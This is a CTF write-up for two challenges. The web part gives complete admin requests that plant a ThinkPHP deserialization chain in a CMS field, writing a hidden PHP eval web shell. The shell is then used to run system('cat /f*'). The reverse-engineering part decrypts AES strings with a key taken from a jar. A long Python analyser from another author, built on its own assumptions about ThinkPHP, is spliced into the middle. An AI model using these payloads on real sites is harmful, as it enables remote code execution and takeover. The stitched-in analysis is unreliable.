These two challenges were on the easier side. As an aside, this year's problems were a bit odd (web isn't misc, and re isn't web, is it?), or maybe the times have moved on and everyone is expected to be full-stack ✌ now.

web1

At first my thinking was led astray by Qiangwang Cup's 小浣熊 challenge, and I came in hunting frantically for SQL injection. In the end one try of weak credentials on the admin backend did it: admin/admin.
I collected a pile of POCs and none of them worked. Inside the backend I spent ages on file upload, which also went nowhere. In the end the only option left was to attack the CMS version itself, and I found
https://cn-sec.com/archives/2640154.html. Just follow the method in that article.
Go to the bottom-most entry in the left-hand menu, the function map, and enable the column fields. Then add a field:

POST /login.php?m=admin&c=Field&a=arctype_add_ajax&_ajax=1&lang=cn
title=poc3&name=poc3&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99

This creates a new field called poc3. Note its ID (545 in the requests below), then fire the POC. It edits that field and sets dfvalue to a URL-encoded, PHP-serialized ThinkPHP object chain; the innermost think\cache\driver\File object carries a php://filter path whose rot13-encoded "resource" is the web shell stub:

POST /login.php?m=admin&c=Field&a=arctype_edit_ajax&_ajax=1&lang=cn
title=poc3&name=poc3&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=545&old_name=poc3&dtype[]=region

When that is done, request /login.php?m=admin&c=Field&a=channel_edit&channel_id=-99&id=545&_ajax=1. That path returns 500, but by then the shell has been written, so it's getshell:
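To see what the dfvalue in the edit request actually does, here is an added example (my own code, not from the writeup, the article it follows, or the CMS). It URL-decodes the payload, parses the PHP-serialized object graph with a small subset of unserialize(), lists the gadget chain in nesting order, rot13-decodes the php://filter resource, and derives the shell file name. The file-name step is an assumption about ThinkPHP 5.1's think\cache\driver\File: set() writes options['path'] . md5($name) . '.php', and setTagItem() then stores that file name (which carries the planted stub) under the key 'tag_' . md5($tag), so the readable shell is the tag file. In the embedded payload the '+' between 'cuc' and '%40riny' is treated as a form-encoded space belonging to the original request, because the declared length s:68 only adds up with it and PHP's open tag needs whitespace after it.

```python
import codecs
import hashlib
from urllib.parse import unquote_plus

# dfvalue from the arctype_edit_ajax request above (form-encoded, so '+' is a space).
DFVALUE = (
    "O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7B"
    "i%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7B"
    "i%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5C"
    "relation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput"
    "%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B"
    "%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7B"
    "s%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A"
    "%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3B"
    "s%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG"
    "%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D"
)


def php_unserialize(data, pos=0):
    """Parse the subset of PHP's serialize() format this payload uses (O, a, s, i, b, N).
    Objects come back as ("object", class_name, {prop: value}); arrays as dicts.
    String lengths are byte counts in PHP; the payload is pure ASCII, so chars == bytes."""
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ib":                                  # i:<int>;  b:<0|1>;
        end = data.index(";", pos)
        v = int(data[pos + 2:end])
        return (bool(v) if t == "b" else v), end + 1
    if t == "s":                                   # s:<len>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2
        s = data[start:start + length]
        if data[start + length:start + length + 2] != '";':
            raise ValueError("string length does not match payload at %d" % pos)
        return s, start + length + 2
    if t == "a":                                   # a:<count>:{<key><value>...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2
        arr = {}
        for _ in range(count):
            k, pos = php_unserialize(data, pos)
            v, pos = php_unserialize(data, pos)
            arr[k] = v
        return arr, pos + 1
    if t == "O":                                   # O:<len>:"<class>":<count>:{<props>}
        colon = data.index(":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        pos = colon + 2 + name_len + 2
        colon = data.index(":", pos)
        count = int(data[pos:colon])
        pos = colon + 2
        props = {}
        for _ in range(count):
            k, pos = php_unserialize(data, pos)
            v, pos = php_unserialize(data, pos)
            props[k] = v
        return ("object", name, props), pos + 1
    raise ValueError("unsupported type %r at %d" % (t, pos))


def find_objects(value, out=None):
    """Depth-first list of (class_name, props) in the order the objects are nested."""
    if out is None:
        out = []
    if isinstance(value, tuple) and value[0] == "object":
        out.append((value[1], value[2]))
        value = value[2]
    if isinstance(value, dict):
        for v in value.values():
            find_objects(v, out)
    return out


def shell_filename(base, tag):
    """ASSUMPTION (ThinkPHP 5.1 think\\cache\\driver\\File): set() writes path . md5($name) . '.php',
    then setTagItem() stores that file name under 'tag_' . md5($tag). Because the file name
    contains the rot13'd stub and the write goes through string.rot13, the tag file ends up
    holding '<?php @eval(...)' in clear, so that is the file to request."""
    tag_key = "tag_" + hashlib.md5(tag.encode()).hexdigest()
    return base + hashlib.md5(tag_key.encode()).hexdigest() + ".php"


def analyse(dfvalue=DFVALUE):
    serialized = unquote_plus(dfvalue)
    root, end = php_unserialize(serialized)
    if end != len(serialized):
        raise ValueError("trailing bytes after the object graph")
    objects = find_objects(root)
    sink = dict(objects)["think\\cache\\driver\\File"]
    path = sink["options"]["path"]                 # php://filter/string.rot13/resource=<?cuc ...>/../a.php
    resource = path.split("resource=", 1)[1]
    planted, base = resource.split("/../", 1)      # planted dir name is collapsed by '/../' on open
    return {
        "chain": [name for name, _ in objects],
        "path": path,
        "stub": codecs.decode(planted, "rot13"),   # what the rot13 write filter turns it into
        "shell": shell_filename(base, sink["tag"]),
    }


if __name__ == "__main__":
    result = analyse()
    print("gadget chain:", " -> ".join(result["chain"]))
    print("sink path   :", result["path"])
    print("on disk     :", result["stub"])
    print("shell file  :", result["shell"])
```

Compare the last line of output with the file name requested in the writeup; if the assumed tag logic matches the deployed ThinkPHP version, they agree, and if not, the first cache file (md5 of the session name plus "removeWhereField") is the other candidate.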
/a.php617ac73525b333bea4ac35a717dd8b0a.php?_=system('cat /f*');

Re2

Dragging the jar into a decompiler shows that it contains the key and a hint about the cipher (AES). Next comes finding the ciphertext, which I got wrong at first.
Searching here turned up a pile of Java class names; scrolling through the classes below, I found this block.

Extract the ciphertexts with a regex:
import re

# read the file contents
with open('pwd.txt', 'r', encoding='utf-8') as file:
    content = file.read()

# extract everything inside parentheses with a regex
matches = re.findall(r'\(([^)]*)\)', content)

# print and save the results
for match in matches:
    print(match)

with open('extracted_content.txt', 'w', encoding='utf-8') as output_file:
    for match in matches:
        output_file.write(match + '\n\n')
Straight to GPT, and just run it:

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# key from the jar (16 bytes, so AES-128)
key = b'Y4SuperSecretKey'

# list of ciphertexts (base64)
ciphertexts = [
    'lD0pdU19mlA1xzNMZScMow',
    'vHTdmhywhmrERttY0v8WPA',
    'wOd4I7sVhw5HkgZMqTQlaA',
    'yV6xw9tYxleD0h9egW2/XNXXL1pHUnuP3m8ii1TeCMSJTegZd2igKplap480ZRD/zkyXFtgSjExqvp5RTM5rjfOaEyoSArhtwuiS5U',
    'edT1iLMQCSvyHMUjip/M/A',
    'vHTdmhywhmrERttY0v8WPA',
    'wOd4I7sVhw5HkgZMqTQlaA',
    'xkXC55umWZBHWtLx1dCCw',
    'uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo',
    'vHTdmhywhmrERttY0v8WPA',
    'BLYz3Sg6p3/X/BPYNW1L7FPYr0DwjapP8ge2BnUIVgk',
    'uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo',
    '3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7',
    'yV6xw9tYxleD0h9egW2/XSxK49PPZReLv9k58hqjT8',
    '1sth17wAFRt4wAGPDITmg',
    'yV6xw9tYxleD0h9egW2/XnNOjAgvjLs2pu7dXzqrI',
    'Anj05GN/w2zBXhTp7riKrGXt8cugU0ZLiec1Gsd1JsPe9kdfQpqBwV8tlru4DIUbg2ym6/BKkXTIkIAsDbA9g',
    'nG1R4Vi6NnBcBZ/yoHLWrQ',
    'aa5CJ5IF6MOG2H2e1Wdhg',
    'KYLTetODpmvJ6F1dm/8ghQ',
    'KYLTetODpmvJ6F1dm/8ghQ',
    'vNXU4qrC9TvFzpRv4tbSsJW9UbGnputRSzGdevVAiG0wps8qiqPXXoCmmnIex25',
    'KYLTetODpmvJ6F1dm/8ghQ',
    'vNXU4qrC9TvFzpRv4tbSsJW9UbGnputRSzGdevVAiG0wps8qiqPXXoCmmnIex25',
    'LUj6lY0pyGsgf7h8uGlrUTP24ysker1No7mzBIAUHjcwsEmlkBNavkjjdNx7605ybDccQ/I5izOOjOSSYUbIMA',
    'uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo',
    'FHbZr6qgY3p8S52uoSwUrzLJu/BapSVDBVcsY//3k',
    'hllzo1U5TtIPfKWnxzEkWKPnX8SgrjiSIMuSly1LX78',
    '3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7',
    'gvewj5POa93RqmusJXQ4A',
    'YwDUGijDV5zY3M45IJyypg',
]

# AES-ECB decryptor (no IV, every 16-byte block decrypted independently)
cipher = AES.new(key, AES.MODE_ECB)

# decrypt every ciphertext
for ct in ciphertexts:
    try:
        # restore any missing base64 '=' padding; strings that still do not decode are reported
        ciphertext = base64.b64decode(ct + '=' * (-len(ct) % 4))
        decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)
        print(decrypted.decode('utf-8'))
    except Exception as e:
        print(f'decryption failed: {ct}, error: {e}')